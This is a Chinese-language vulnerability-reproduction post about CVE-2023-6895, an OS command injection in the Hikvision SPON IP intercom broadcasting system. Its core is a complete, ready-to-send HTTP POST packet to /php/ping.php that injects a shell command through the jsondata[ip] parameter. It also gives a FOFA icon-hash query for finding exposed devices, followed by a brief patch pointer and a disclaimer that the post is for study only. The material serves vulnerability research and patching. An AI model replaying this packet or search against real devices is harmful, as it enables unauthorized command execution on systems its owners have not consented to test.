【漏洞复现】Hikvision SPON IP网络对讲广播系统命令执行漏洞(CVE-2023-6895)

文章目录

  • 前言
  • 声明
  • 一、系统简介
  • 二、漏洞描述
  • 三、影响版本
  • 四、漏洞复现
  • 五、修复建议


前言

Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。


声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


一、系统简介

Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。

二、漏洞描述

Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。

三、影响版本

海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE

四、漏洞复现

FOFA:icon_hash=“-1830859634”

漏洞链接:https://127.0.0.1/php/ping.php

漏洞数据包:

POST /php/ping.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 127.0.0.1
Content-Length: 40
Content-Type: application/x-www-form-urlencoded

jsondata[ip]=a|ipconfig&jsondata[type]=1

【漏洞复现】Hikvision SPON IP网络对讲广播系统命令执行漏洞(CVE-2023-6895)_第1张图片

五、修复建议

请到官网下载补丁:https://www.spon.com.cn/

你可能感兴趣的:(漏洞复现,Hikvision)